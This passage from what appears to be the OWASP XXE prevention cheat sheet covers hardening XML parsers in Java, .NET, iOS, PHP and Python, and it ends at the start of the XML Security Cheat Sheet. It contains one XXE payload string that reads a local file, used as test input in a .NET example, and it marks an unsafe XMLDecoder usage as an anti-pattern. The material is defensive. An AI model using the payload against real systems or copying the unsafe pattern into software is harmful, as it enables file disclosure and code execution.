import javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\nimport org.xml.sax.SAXException;\nimport java.io.IOException;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {    // If you can't completely disable DTDs, then at least do the following:\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities\n// JDK7+ - http://xml.org/sax/features/external-general-entities\n//This feature has to be used together with the following one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-general-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities\n// JDK7+ - http://xml.org/sax/features/external-parameter-entities\n//This feature has to be used together with the previous one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-parameter-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Disable external DTDs as well\nFEATURE = \"http://apache.org/xml/features/nonvalidating/load-external-dtd\";\ndbf.setFeature(FEATURE, false);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\ndbf.setExpandEntityReferences(false);\n\n// As stated in the documentation \"Feature for Secure Processing (FSP)\" is the central mechanism to \n// help safeguard XML processing. It instructs XML processors, such as parsers, validators, \n// and transformers, to try and process XML securely. This can be used as an alternative to\n// dbf.setExpandEntityReferences(false); to allow some safe level of Entity Expansion\n// Exists from JDK6.\ndbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\n\n\n// And, per Timothy Morgan: \"If for some reason support for inline DOCTYPEs are a requirement, then\n// ensure the entity settings are disabled (as shown above) and beware that SSRF attacks\n// (http://cwe.mitre.org/data/definitions/918.html) and denial\n// of service attacks (such as billion laughs or decompression bombs via \"jar:\") are a risk.\"\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is probably not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still be possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using an XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

Xerces 1 Features:

Xerces 2 Features:

Note: The above defenses require Java 7 update 67, Java 8 update 20, or above, because the above countermeasures for DocumentBuilderFactory and SAXParserFactory are broken in earlier Java versions, per: CVE-2014-6517.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory-a-stax-parser","title":"XMLInputFactory (a StAX parser)","text":"

StAX parsers such as XMLInputFactory allow various properties and features to be set.

To protect a Java XMLInputFactory from XXE, disable DTDs (doctypes) altogether:

// This disables DTDs entirely for that factory\nxmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);\n

or if you can't completely disable DTDs:

// This causes XMLStreamException to be thrown if external DTDs are accessed.\nxmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\n// disable external entities\nxmlInputFactory.setProperty(\"javax.xml.stream.isSupportingExternalEntities\", false);\n

The setting xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\"); is not required, as XMLInputFactory is dependent on Validator to perform XML validation against Schemas. Check the Validator section for the specific configuration.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#oracle-dom-parser","title":"Oracle DOM Parser","text":"

Follow the Oracle recommendation, for example:

    // Extend oracle.xml.parser.v2.XMLParser\nDOMParser domParser = new DOMParser();\n\n// Do not expand entity references\ndomParser.setAttribute(DOMParser.EXPAND_ENTITYREF, false);\n\n// dtdObj is an instance of oracle.xml.parser.v2.DTD\ndomParser.setAttribute(DOMParser.DTD_OBJECT, dtdObj);\n\n// Do not allow more than 11 levels of entity expansion\ndomParser.setAttribute(DOMParser.ENTITY_EXPANSION_DEPTH, 12);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory","title":"TransformerFactory","text":"

To protect a javax.xml.transform.TransformerFactory from XXE, do this:

TransformerFactory tf = TransformerFactory.newInstance();\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator","title":"Validator","text":"

To protect a javax.xml.validation.Validator from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nSchema schema = factory.newSchema();\nValidator validator = schema.newValidator();\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#schemafactory","title":"SchemaFactory","text":"

To protect a javax.xml.validation.SchemaFactory from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nfactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nSchema schema = factory.newSchema(Source);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxtransformerfactory","title":"SAXTransformerFactory","text":"

To protect a javax.xml.transform.sax.SAXTransformerFactory from XXE, do this:

SAXTransformerFactory sf = SAXTransformerFactory.newInstance();\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nsf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\nsf.newXMLFilter(Source);\n

Note: Use of the following XMLConstants requires JAXP 1.5, which was added to Java in 7u40 and Java 8:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader","title":"XMLReader","text":"

To protect a Java org.xml.sax.XMLReader from XXE, do this:

XMLReader reader = XMLReaderFactory.createXMLReader();\nreader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.\nreader.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nreader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader","title":"SAXReader","text":"

To protect a Java org.dom4j.io.SAXReader from XXE, do this:

saxReader.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nsaxReader.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\n

Based on testing, if you are missing one of these, you can still be vulnerable to an XXE attack.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder","title":"SAXBuilder","text":"

To protect a Java org.jdom2.input.SAXBuilder from XXE, disallow DTDs (doctypes) entirely:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\",true);\nDocument doc = builder.build(new File(fileName));\n

Alternatively, if DTDs can't be completely disabled, disable external entities and entity expansion:

SAXBuilder builder = new SAXBuilder();\nbuilder.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nbuilder.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nbuilder.setExpandEntities(false);\nDocument doc = builder.build(new File(fileName));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#no-op-entityresolver","title":"No-op EntityResolver","text":"

For APIs that take an EntityResolver, you can neutralize an XML parser's ability to resolve entities by supplying a no-op implementation:

public final class NoOpEntityResolver implements EntityResolver {\npublic InputSource resolveEntity(String publicId, String systemId) {\nreturn new InputSource(new StringReader(\"\"));\n}\n}\n\n// ...\n\nxmlReader.setEntityResolver(new NoOpEntityResolver());\ndocumentBuilder.setEntityResolver(new NoOpEntityResolver());\n

or more simply:

EntityResolver noop = (publicId, systemId) -> new InputSource(new StringReader(\"\"));\nxmlReader.setEntityResolver(noop);\ndocumentBuilder.setEntityResolver(noop);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxb-unmarshaller","title":"JAXB Unmarshaller","text":"

Since a javax.xml.bind.Unmarshaller parses XML and does not support any flags for disabling XXE, it's imperative to parse the untrusted XML through a configurable secure parser first, generate a source object as a result, and pass the source object to the Unmarshaller. For example:

SAXParserFactory spf = SAXParserFactory.newInstance();\n\n//Option 1: This is the PRIMARY defense against XXE\nspf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Option 2: If disabling doctypes is not possible\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nspf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nspf.setXIncludeAware(false);\n\n//Do unmarshall operation\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),\nnew InputSource(new StringReader(xml)));\nJAXBContext jc = JAXBContext.newInstance(Object.class);\nUnmarshaller um = jc.createUnmarshaller();\num.unmarshal(xmlSource);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression","title":"XPathExpression","text":"

A javax.xml.xpath.XPathExpression cannot be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first.

For example:

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ndf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\nDocumentBuilder builder = df.newDocumentBuilder();\n// Compile the XPath query (xpathQuery is the expression string) and evaluate it\n// against the document produced by the securely configured parser\nXPathExpression expression = XPathFactory.newInstance().newXPath().compile(xpathQuery);\nString result = expression.evaluate(builder.parse(\nnew ByteArrayInputStream(xml.getBytes())));\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#javabeansxmldecoder","title":"java.beans.XMLDecoder","text":"

The readObject() method in this class is fundamentally unsafe.

Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and execute arbitrary code as described here.

There is no way to make use of this class safely except to trust or properly validate the input being passed into it.

As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.
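
For illustration only, the following sketch shows the kind of usage to avoid; the class name and input string are hypothetical placeholders, and in a real application the XML would be attacker-controlled:

import java.beans.XMLDecoder;\nimport java.io.ByteArrayInputStream;\nimport java.nio.charset.StandardCharsets;\n\n// Anti-pattern: never pass untrusted XML to XMLDecoder.\n// readObject() will construct whatever objects (and call whatever methods) the XML describes.\npublic class XmlDecoderAntiPattern {\npublic static void main(String[] args) {\n// Hypothetical placeholder; in a real application this would be attacker-controlled\nString untrustedXml = \"<java version='1.8' class='java.beans.XMLDecoder'><string>attacker controlled</string></java>\";\ntry (XMLDecoder decoder = new XMLDecoder(new ByteArrayInputStream(untrustedXml.getBytes(StandardCharsets.UTF_8)))) {\nObject result = decoder.readObject(); // unsafe with untrusted input\nSystem.out.println(result);\n}\n}\n}\n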

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#other-xml-parsers","title":"Other XML Parsers","text":"

There are many third-party libraries that parse XML either directly or through their use of other libraries. Please test and verify that their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions, like the examples given above. If no such control is exposed, make sure the untrusted content is passed through a secure parser first and then passed to the insecure third-party parser, similar to how the Unmarshaller is secured; this pattern is sketched below.
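
Assuming a JAXP DocumentBuilderFactory and a hypothetical helper class (not part of the original cheat sheet), that pre-parsing pattern might look like this:

import javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport org.w3c.dom.Document;\nimport java.io.ByteArrayInputStream;\nimport java.nio.charset.StandardCharsets;\n\n// Hypothetical helper: parse untrusted XML with a hardened parser first,\n// then hand the resulting Document to the third-party library.\npublic class SecurePreParse {\npublic static Document parseUntrusted(String xml) throws Exception {\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\n// Primary defense: disallow DOCTYPE declarations entirely\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\ndbf.setXIncludeAware(false);\ndbf.setExpandEntityReferences(false);\nDocumentBuilder builder = dbf.newDocumentBuilder();\nreturn builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));\n}\n}\n

The returned Document (or a re-serialized copy of it) can then be handed to the third-party library instead of the raw untrusted input.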

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#spring-framework-mvcoxm-xxe-vulnerabilities","title":"Spring Framework MVC/OXM XXE Vulnerabilities","text":"

For example, some XXE vulnerabilities were found in Spring OXM and Spring MVC. The following versions of the Spring Framework are vulnerable to XXE:

There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.

For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE.

Here's what they say:

Two situations developers must handle:

The issue Spring fixed:

For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.

Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:

import org.springframework.oxm.jaxb.Jaxb2Marshaller;\n\nJaxb2Marshaller marshaller = new Jaxb2Marshaller();\n// Must cast the returned Object to whatever type you are unmarshalling\nmarshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML)));\n

So, per the Spring OXM CVE writeup, the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#castor","title":"Castor","text":"

Castor is a data binding framework for Java. It allows conversion between Java objects, XML, and relational tables. The XML features in Castor prior to version 1.3.3 are vulnerable to XXE and should be upgraded to the latest version. For additional information, check the official XML configuration file.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net","title":".NET","text":"

The following up-to-date information on XXE injection in .NET is directly from this web application of unit tests by Dean Fleming. This web application covers all currently supported .NET XML parsers and has test cases for each, demonstrating when they are safe from XXE injection and when they are not. However, these tests only cover injection from file, not direct DTD (as used by DoS attacks).

For DoS attacks using a direct DTD (such as the Billion laughs attack), a separate testing application from Josh Grossman at Bounce Security has been created to verify that .NET >=4.5.2 is safe from these attacks.

Previously, this information was based on some older articles which may not be 100% accurate, including:

The following table lists all supported .NET XML parsers and their default safety levels. Note that in .NET Framework \u22654.5.2, in all cases, if a DoS attempt is performed, an exception is thrown because the expanded XML exceeds the allowed number of characters.

Table explanation:

Attack Type | .NET Framework Version | XDocument (Linq to XML) | XmlDictionaryReader | XmlDocument | XmlNodeReader | XmlReader | XmlTextReader | XPathNavigator | XslCompiledTransform\nExternal entity Attacks | <4.5.2 | \u2705 | \u2705 | \u274c | \u2705 | \u2705 | \u274c | \u274c | \u2705\nExternal entity Attacks | \u22654.5.2 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705 | \u2705\nBillion Laughs | <4.5.2 | \u2753 | \u2705 | \u274c | \u2705 | \u2705 | \u274c | \u274c | \u2705\nBillion Laughs | \u22654.5.2 | \u2705 | \u2705* | \u2705 | \u2705* | \u2705* | \u2705 | \u2705 | \u2705

* For .NET Framework Versions \u22654.5.2, these libraries won't even process the in-line DTD by default. Even if you change the default to allow processing a DTD, if a DoS attempt is performed an exception will still be thrown as documented above.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#linq-to-xml","title":"LINQ to XML","text":"

Both the XElement and XDocument objects in the System.Xml.Linq library are safe from XXE injection from external files and from DoS attacks by default. XElement parses only the elements within the XML file, so DTDs are ignored altogether. XDocument has its XmlResolver disabled by default, so it is safe from SSRF. While DTDs are enabled by default, in Framework versions \u22654.5.2 it is not vulnerable to DoS as noted, but it may be vulnerable in earlier Framework versions. For more information, see Microsoft's guidance on how to prevent XXE and XML Denial of Service in .NET.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldictionaryreader","title":"XmlDictionaryReader","text":"

System.Xml.XmlDictionaryReader is safe by default: when it attempts to parse the DTD, an exception is thrown saying that \"CData elements not valid at top level of an XML document\". It becomes unsafe if constructed with a different, unsafe XML parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmldocument","title":"XmlDocument","text":"

Prior to .NET Framework version 4.5.2, System.Xml.XmlDocument is unsafe by default. The XmlDocument object has an XmlResolver object within it that needs to be set to null in versions prior to 4.5.2. In versions 4.5.2 and up, this XmlResolver is set to null by default.

The following example shows how it is made safe:

static void LoadXML()\n{\nstring xxePayload = \"<!DOCTYPE doc [<!ENTITY win SYSTEM 'file:///C:/Users/testdata2.txt'>]>\"\n+ \"<doc>&win;</doc>\";\nstring xml = \"<?xml version='1.0' ?>\" + xxePayload;\n\nXmlDocument xmlDoc = new XmlDocument();\n// Setting this to NULL disables DTDs - it's NOT null by default in versions prior to 4.5.2.\nxmlDoc.XmlResolver = null;\nxmlDoc.LoadXml(xml);\nConsole.WriteLine(xmlDoc.InnerText);\nConsole.ReadLine();\n}\n

For .NET Framework version \u22654.5.2, this is safe by default.

XmlDocument can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlnodereader","title":"XmlNodeReader","text":"

System.Xml.XmlNodeReader objects are safe by default and will ignore DTDs even when constructed with an unsafe parser or wrapped in another unsafe parser.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_1","title":"XmlReader","text":"

System.Xml.XmlReader objects are safe by default.

They are set by default to have their ProhibitDtd property set to true in .NET Framework versions prior to 4.0, or their DtdProcessing property set to Prohibit in .NET Framework versions 4.0 and later.

Additionally, in .NET versions 4.5.2 and later, the XmlReaderSettings belonging to the XmlReader has its XmlResolver set to null by default, which provides an additional layer of safety.

Therefore, XmlReader objects will only become unsafe in version 4.5.2 and up if both the DtdProcessing property is set to Parse and the XmlReaderSetting's XmlResolver is set to a nonnull XmlResolver with default or unsafe settings. If you need to enable DTD processing, instructions on how to do so safely are described in detail in the referenced MSDN article.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmltextreader","title":"XmlTextReader","text":"

System.Xml.XmlTextReader is unsafe by default in .NET Framework versions prior to 4.5.2. Here is how to make it safe in various .NET versions:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#prior-to-net-40","title":"Prior to .NET 4.0","text":"

In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader objects like XmlTextReader are controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes.

Set these values to true to disable inline DTDs completely.

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is FALSE!!\nreader.ProhibitDtd = true;  
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-40-net-452","title":".NET 4.0 - .NET 4.5.2","text":"

In .NET Framework version 4.0, DTD parsing behavior was changed. The ProhibitDtd property was deprecated in favor of the new DtdProcessing property.

However, the default settings were not changed, so XmlTextReader is still vulnerable to XXE by default.

Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a <!DOCTYPE> element is present in the XML.

To set this value yourself, it looks like this:

XmlTextReader reader = new XmlTextReader(stream);\n// NEEDED because the default is Parse!!\nreader.DtdProcessing = DtdProcessing.Prohibit;  

Alternatively, you can set the DtdProcessing property to Ignore, which will not throw an exception on encountering a <!DOCTYPE> element but will simply skip over it and not process it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#net-452-and-later","title":".NET 4.5.2 and later","text":"

In .NET Framework versions 4.5.2 and up, XmlTextReader's internal XmlResolver is set to null by default, making the XmlTextReader ignore DTDs by default. The XmlTextReader can become unsafe if you create your own nonnull XmlResolver with default or unsafe settings.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathnavigator","title":"XPathNavigator","text":"

System.Xml.XPath.XPathNavigator is unsafe by default in .NET Framework versions prior to 4.5.2.

This is because it navigates IXPathNavigable objects such as XmlDocument, which are also unsafe by default in versions prior to 4.5.2.

You can make XPathNavigator safe by giving it a safe parser like XmlReader (which is safe by default) in the XPathDocument's constructor.

Here is an example:

XmlReader reader = XmlReader.Create(\"example.xml\");\nXPathDocument doc = new XPathDocument(reader);\nXPathNavigator nav = doc.CreateNavigator();\nstring xml = nav.InnerXml.ToString();\n

For .NET Framework version \u22654.5.2, XPathNavigator is safe by default.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xslcompiledtransform","title":"XslCompiledTransform","text":"

System.Xml.Xsl.XslCompiledTransform (an XML transformer) is safe by default as long as the parser it's given is safe.

It is safe by default because the default parser of the Transform() methods is an XmlReader, which is safe by default (per above).

The source code for this method is here.

Some of the Transform() methods accept an XmlReader or IXPathNavigable (e.g., XmlDocument) as an input, and if you pass in an unsafe XML Parser then the Transform will also be unsafe.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#ios","title":"iOS","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2_1","title":"libxml2","text":"

iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly.

However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#nsxmldocument","title":"NSXMLDocument","text":"

iOS also provides an NSXMLDocument type, which is built on top of libxml2.

However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly.

Per the 'NSXMLDocument External Entity Restriction API' section of this page:

However, to completely disable XXE in an NSXMLDocument in any version of iOS you simply specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#php","title":"PHP","text":"

When using the default XML parser (based on libxml2), PHP 8.0 and newer prevent XXE by default.

For PHP versions prior to 8.0, per the PHP documentation, the following should be set when using the default PHP XML parser in order to prevent XXE:

libxml_set_external_entity_loader(null);\n

A description of how to abuse this in PHP is presented in a good SensePost article describing a PHP-based XXE vulnerability that was fixed in Facebook.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python","title":"Python","text":"

The Python 3 official documentation contains a section on xml vulnerabilities. As of 1 January 2020, Python 2 is no longer supported; however, the Python website still contains some legacy documentation.

The following table gives an overview of various modules in Python 3 used for XML parsing and whether or not they are vulnerable.

Attack Type | sax | etree | minidom | pulldom | xmlrpc\nBillion Laughs | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable\nQuadratic Blowup | Vulnerable | Vulnerable | Vulnerable | Vulnerable | Vulnerable\nExternal Entity Expansion | Safe | Safe | Safe | Safe | Safe\nDTD Retrieval | Safe | Safe | Safe | Safe | Safe\nDecompression Bomb | Safe | Safe | Safe | Safe | Vulnerable

To protect your application from the applicable attacks, two packages exist to help you sanitize your input and protect your application against DDoS and remote attacks.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java_1","title":"Java","text":"

Below are the rules for different XML parsers in Java:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#digester","title":"Digester","text":"

Rule for identifying XXE vulnerabilities in the org.apache.commons.digester3.Digester library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-Digester

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#documentbuilderfactory","title":"DocumentBuilderFactory","text":"

Rule for identifying XXE vulnerabilities in the javax.xml.parsers.DocumentBuilderFactory library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-dbf

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxbuilder_1","title":"SAXBuilder","text":"

Rule for identifying XXE vulnerabilities in the org.jdom2.input.SAXBuilder library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-saxbuilder

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxparserfactory","title":"SAXParserFactory","text":"

Rule for identifying XXE vulnerabilities in the javax.xml.parsers.SAXParserFactory library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-SAXParserFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#saxreader_1","title":"SAXReader","text":"

Rule for identifying XXE vulnerabilities in the org.dom4j.io.SAXReader library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-SAXReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory","title":"XMLInputFactory","text":"

Rule for identifying XXE vulnerabilities in the javax.xml.stream.XMLInputFactory library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-XMLInputFactory

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlreader_2","title":"XMLReader","text":"

Rule for identifying XXE vulnerabilities in the org.xml.sax.XMLReader library. The rule can be played here: https://semgrep.dev/s/salecharohit:xxe-XMLReader

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html","title":"XML Security Cheat Sheet","text":""},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can also be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet describes how these attack possibilities can be exploited in libraries and software, divided into two sections:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#malformed-xml-documents","title":"Malformed XML Documents","text":"

The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be treated as a fatal error and the data it contains is considered malformed. Multiple tactics will produce a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.

The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significantly more time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#more-time-required","title":"More Time Required","text":"

A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS).

To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.
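
As a rough illustration, such a timing comparison could be sketched in Java as follows; the class name and file names are placeholders for a regular document and a deliberately malformed copy:

import javax.xml.parsers.DocumentBuilderFactory;\nimport java.io.File;\n\n// Hypothetical timing harness: compare the time needed to parse a regular document\n// against the time needed for a malformed variant of the same document.\npublic class ParseTiming {\nstatic long timeParse(String path) {\nlong start = System.nanoTime();\ntry {\nDocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File(path));\n} catch (Exception e) {\n// Malformed input is expected to fail; only the elapsed time matters here\n}\nreturn System.nanoTime() - start;\n}\n\npublic static void main(String[] args) {\nSystem.out.println(\"well-formed: \" + timeParse(\"regular.xml\") + \" ns\");\nSystem.out.println(\"malformed: \" + timeParse(\"malformed.xml\") + \" ns\");\n}\n}\n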

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#applications-processing-malformed-data","title":"Applications Processing Malformed Data","text":"

